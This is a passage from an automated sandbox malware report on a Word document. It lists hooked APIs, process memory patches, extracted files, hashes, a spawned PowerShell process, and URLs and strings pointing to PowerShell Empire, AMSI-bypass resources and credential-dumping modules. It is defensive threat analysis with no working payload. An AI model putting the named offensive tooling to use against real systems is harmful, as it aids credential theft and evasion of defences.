"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000027.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui" - source
- API Call
- relevance
- 7/10
-
Chained signature (with api-8702...). Detects file write then load as module
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "beijaflore.com"
Pattern match: "https://github.com/BC-SECURITY/DEFCON27"
Pattern match: "https://www.youtube.com/watch?v=F_BvtXzH4a4"
Pattern match: "https://www.youtube.com/watch?v=6J8pw_bM-i4"
Pattern match: "https://github.com/cobbr/PSAmsi"
Pattern match: "https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py"
Pattern match: "https://www.virustotal.com/gui/"
Pattern match: "https://github.com/EmpireProject/Empire/blob/master/lib/powershell/Invoke-Obfuscation/Invoke-Obfuscation.ps1"
Pattern match: "https://twitter.com/_vinnybod/status/1386442836417994752"
Pattern match: "https://python-poetry.org/"
Pattern match: "https://xlsxwriter.readthedocs.io/"
Pattern match: "https://github.com/BC-SECURITY/Empire/pull/457"
Pattern match: "https://github.com/BC-SECURITY/Empire/commits/master/lib/common/bypasses.py"
Pattern match: "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Invoke-Obfuscation.psd1"
Pattern match: "https://pypi.org/project/click/"
Pattern match: "https://github.com/Beijaflore-Security-LAB/EmpireExceller"
Pattern match: "https://github.com/BC-SECURITY/Empire"
Heuristic match: "> ./golden_ticket.py"
Heuristic match: "> ./logon_passwords.py"
Heuristic match: "> ./lsadump.py"
Heuristic match: "> ./sam.py"
Pattern match: "http://localhost:7474/"
Pattern match: "https://localhost:1337/api/admin/login"
Pattern match: "https://localhost:1337/api/map?token="
Pattern match: "https://localhost:1337/api/modules?token=%3cTOKEN"
Heuristic match: "(Get-Command).Name"
Heuristic match: "poetry run ./empire_exceller.py"
Heuristic match: "/usr/share/powershell-empire/lib/modules/powershell/collection/browser_data.py"
Pattern match: "DOCNAME.docm/Microsoft"
Pattern match: "https://amsi.fail/"
Heuristic match: "QscYe_8] kO~Iu+CK}NX_a1+cfLoC*)pkEyu]XQ|>8T>(g('H+}e%9tUoE?el.ax"
Heuristic match: "Le$7xk<?M)!~z/z<{}Y[`m?4[qwU C?'}s9!WhevTqWhei~y.n>$%Vp.><yN);O?j$y-HXQVKFP:/fCY3v^ <@.=p#.ZA"
Pattern match: "RkQ.XkT/6&|@P4OJMVSQzPtr5!G"
Pattern match: "r.Mu/@kFSCeR2P"
Heuristic match: "<_D.221$L]:7']&j&|AEGD%?9i&rVz&P1{yE9]I/ft5?'/B:jo D1E6m0QQGw?M6QGEO:3t_%D`N#fU\%Vj8U?X%xPfori[O'|5;CL &~9Aty|*YPv}:oMx^<31-P-w/:h}L[BUTkg(Nf)8r&jjDe^~35.Cr"
Heuristic match: "zj_#Lo%Y]dN&]aW@Yi$6SEL].gT"
Pattern match: "1Pa.AP//kdAC$o"
Heuristic match: "d;^BhX*$+aEIt.Su"
Pattern match: "G.nw/t[W;j?#KEZKpRvpGx,b~eA0D/k" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"https://www.youtube.com/watch?v=F_BvtXzH4a4" (Indicator: "youtube")
"https://www.youtube.com/watch?v=6J8pw_bM-i4" (Indicator: "youtube")
"https://twitter.com/_vinnybod/status/1386442836417994752" (Indicator: "twitter")
"HYPERLINK "https://www.youtube.com/watch?v=F_BvtXzH4a4" https://www.youtube.com/watch?v=F_BvtXzH4a4" (Indicator: "youtube")
"HYPERLINK "https://www.youtube.com/watch?v=6J8pw_bM-i4" https://www.youtube.com/watch?v=6J8pw_bM-i4" (Indicator: "youtube")
"HYPERLINK "https://twitter.com/_vinnybod/status/1386442836417994752" https://twitter.com/_vinnybod/status/1386442836417994752" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e6c80e3d" to virtual address "0x67E478E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e9d73287ef" to virtual address "0x773B47BA" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754A1408" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b89012f870ffe0" to virtual address "0x754A1248" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B8348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "9b7c0e3d" to virtual address "0x6934F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754A12CC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8114a75" to virtual address "0x754B834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b88011f870ffe0" to virtual address "0x75A01368" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B83C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "5205cd3c" to virtual address "0x66E40BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "3be20c3d" to virtual address "0x6E3DCA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "f8114a75" to virtual address "0x754B83C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754A139C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754A12DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B83DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9848e31ef" to virtual address "0x778CF71B" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "1e7300d9" to virtual address "0x61F710AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9c45487ef" to virtual address "0x773B3F20" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9ab9989ef" to virtual address "0x773B5D66" ("VariantChangeType@OLEAUT32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
13272bdbbae69fddddb6e289f8bf603e
- Filename
- 13272bdbbae69fddddb6e289f8bf603e
- Size
- 2.5MiB (2648707 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- c96ab20d969e27333a77b49ba7da2fd426f58955f7f3284058bf29257118cf0c
- MD5
- 13272bdbbae69fddddb6e289f8bf603e
- SHA1
- 690fce07eb9b03141713eb76a7bad05a337e399d
- ssdeep
- 49152:dJDkEs+VYalj+aNmyGkKm4u6omflhWI5Ne0UkRqANFY8qi0dVP:dls+VFj+aNm26oGrp5PUkZNFYt/DP
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 2 processes in total.
-
WINWORD.EXE
/n "C:\13272bdbbae69fddddb6e289f8bf603e.doc"
(PID: 3240)
- powershell.exe (PID: 3024)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
Displaying 21 extracted file(s). The remaining 40 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
~_272bdbbae69fddddb6e289f8bf603e.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/59
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative 20
-
-
13272bdbbae69fddddb6e289f8bf603e.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 3 16:04:52 2021, mtime=Thu Jun 3 16:04:52 2021, atime=Thu Jun 3 16:05:11 2021, length=2648707, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- a9a38aa115a93c66b692ae6c44a00ee9
- SHA1
- 0b467508a09bf53f1259751e7f803c921b156887
- SHA256
- 0bfda16f2af5a0d87504337aa3727cb76ce9570db8d2260774000d666bb021a2
-
index.dat
- Size
- 160B (160 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 3ea782f37cb053f63c4b00c1a561f75a
- SHA1
- ff9a8dac81539357ae3e93f490b92ad0e8ede308
- SHA256
- 3b4f9464af04f540de0d2e497a3a3455c0e9777a3bc25a304534ed3803323bbd
-
273C961E.png
- Size
- 71KiB (72725 bytes)
- Type
- img image
- Description
- PNG image data, 947 x 144, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 2ba567b4dd7e4cbe10410bf803647ecb
- SHA1
- 151231e5fa4bb4e86517eed6259600723f4b74ec
- SHA256
- f042dda70c10b4924f7af4b207e3dfa5e4f99d8f67fe22c6733cbb745cac28fb
-
359B47DC.png
- Size
- 171KiB (175234 bytes)
- Type
- img image
- Description
- PNG image data, 1278 x 289, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 0c03e68bf5688bdd0270de5cbdbc0933
- SHA1
- 1b2f5549f5253bb6511425c9b65d38ea03340f8b
- SHA256
- 5a640283df70e343fdecc2f82af91111b9537cdf254a7f0aff0ce36c57344809
-
CAD19387.png
- Size
- 70KiB (71716 bytes)
- Type
- img image
- Description
- PNG image data, 445 x 425, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 6f89583d5212315f29c5198832207130
- SHA1
- 97f607577e3c59be5d302d90c5b26d3a2a4342b8
- SHA256
- 16819544e58c8636e4697322ad78830b692f0501f5b598def7feb33ea4705b56
-
8627D596.png
- Size
- 13KiB (12844 bytes)
- Type
- img image
- Description
- PNG image data, 591 x 118, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 87b3ff35a03a5e0054871144d3359488
- SHA1
- 70fe953289ae55b0d0c43cf2b38b3d091141e4af
- SHA256
- 24c905eeff633d7d573bcb0555701bad6f8e6706ac6f33abfe79d72302fe02cd
-
9CAAB221.png
- Size
- 96KiB (98306 bytes)
- Type
- img image
- Description
- PNG image data, 690 x 643, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- eb9cad6d41c40009a31bb6ec6547d4c0
- SHA1
- 9c678b36a688d29ea008fe8a2a13079d1fe8b727
- SHA256
- 9e46d731fb61696583ee3dbf9d0b45d7fc4dc9d791abad161e4f806e14ad595a
-
C19B2C8C.png
- Size
- 76KiB (77999 bytes)
- Type
- img image
- Description
- PNG image data, 1625 x 99, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 5982b8d4a7d38ca1091c3a725e3d5b4d
- SHA1
- 5929c76757a9e4f5fadf01ca96190af0c2c7d60a
- SHA256
- 976bab72cb4e38da233b5881296dbac302651cb1f03206ff961a599335fc2bd5
-
MSO1036.acl
- Size
- 43KiB (43558 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- a6143a67ec46c532d891d5a640efc58b
- SHA1
- efa059fd418e777316c128701e351a4f4a053766
- SHA256
- 89d24d19b8379a9f592d3f4210398173f4522249aef1c3b8127363342ec616d9
-
D89612A0.png
- Size
- 5.1KiB (5175 bytes)
- Type
- img image
- Description
- PNG image data, 981 x 92, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- ccdb75da7cda63761a00b588a0d75d16
- SHA1
- 6d5015522d85c51737be8ed110c9b39e19f0d45b
- SHA256
- 1338e78c8b5d9c743fba2d6aca01eca84d47e5f3b67f389722ab39dada4a5ca3
-
~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp
- Size
- 106KiB (108120 bytes)
- Type
- doc office
- Description
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 58a36a8c8f818293357e79e6136b62b1
- SHA1
- 08beaba27f8852e9e5eaa78868ce478f81f8b76b
- SHA256
- 7f2226f31f0567a5f25cb227ff452b96db6717e57799ace6ac934449331aa045
-
37590EF7.png
- Size
- 48KiB (49451 bytes)
- Type
- img image
- Description
- PNG image data, 620 x 118, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 7794b532fea093edb2f96cfbc0ccca97
- SHA1
- 1da970f264160e1d1abff311efed6413bd8e5eb9
- SHA256
- 2ed3461e82031ffa9c428de27b4decf0ea912987616e9a6d5228f65dfbb98f9d
-
A6C22666.png
- Size
- 24KiB (24289 bytes)
- Type
- img image
- Description
- PNG image data, 901 x 293, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 995c5c0ebee5859894704ed944e0b231
- SHA1
- 1915ab65b5aa8fffaaab92f1741b6b15fcc37250
- SHA256
- ae2d960bd690b2b8e7c5ea9002176994730da9ddd565f01a2bfbe83fcc3360a2
-
931E972F.png
- Size
- 5.6KiB (5785 bytes)
- Type
- img image
- Description
- PNG image data, 412 x 81, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 7c143996f6f5fc7341ba2a6cf3c1854b
- SHA1
- d9c7648ed62bd193238d38ae955a1733c24a28eb
- SHA256
- ca4a5540e3af9ecd58f3bf8d3d7015fc596c3038d86cfb9d7fe5114b1f065ec0
-
79520336.png
- Size
- 11KiB (11528 bytes)
- Type
- img image
- Description
- PNG image data, 271 x 91, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- ad5cd9372eb16f3251004b8b13fa1eb7
- SHA1
- fab1ee3849a3e67f171c2747e91d9e12f003c876
- SHA256
- dd06fcfb77defee6d877eaa1efdeb1adfad1c64bc84edea49d9b7ffc6f0da1c6
-
1E34ECB4.png
- Size
- 21KiB (21238 bytes)
- Type
- img image
- Description
- PNG image data, 640 x 242, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 8d5bf06bc3b9b6ec6f67c9073d2f1ae1
- SHA1
- 78ed69fae18436be365eb1e0d41d07c9e1e43662
- SHA256
- c0b256f1b26d3fc4a1df3864162317829cfa2c53b7f706002fd100a8afc403c2
-
99725241.png
- Size
- 20KiB (20721 bytes)
- Type
- img image
- Description
- PNG image data, 943 x 54, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- df6cd454045aff33a250c73c37883111
- SHA1
- f920c70ac23148d8d31e6ff2e98554a144c51db6
- SHA256
- 33bfc48cd39d31db5b4e042be5624291d3b8bd0e1ea9263f5d066449ce1b77b6
-
24D0B1D.png
- Size
- 16KiB (16301 bytes)
- Type
- img image
- Description
- PNG image data, 749 x 197, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 4507547bc5b073197b09afb3d6b2671c
- SHA1
- aadb254f90f3bd7981e07df978b6d42021e55599
- SHA256
- 3af6630e4e273e7a95c9ff4c4f6d3899202cf422bfc60939f236784d09e8caf6
-
7D8D2667.png
- Size
- 14KiB (14302 bytes)
- Type
- img image
- Description
- PNG image data, 590 x 168, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 6f00abaad594ea359a840326a487da49
- SHA1
- dc2ea6ffccf62f3f5bb649e119f6e577df03c241
- SHA256
- 40cd19f3b447f59a70f976906175cbe5d2a32aa8ffcd2cd4ab412f2042ed4c18
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
Notifications
-
Runtime
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all process commandlines are present
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "string-63" are available in the report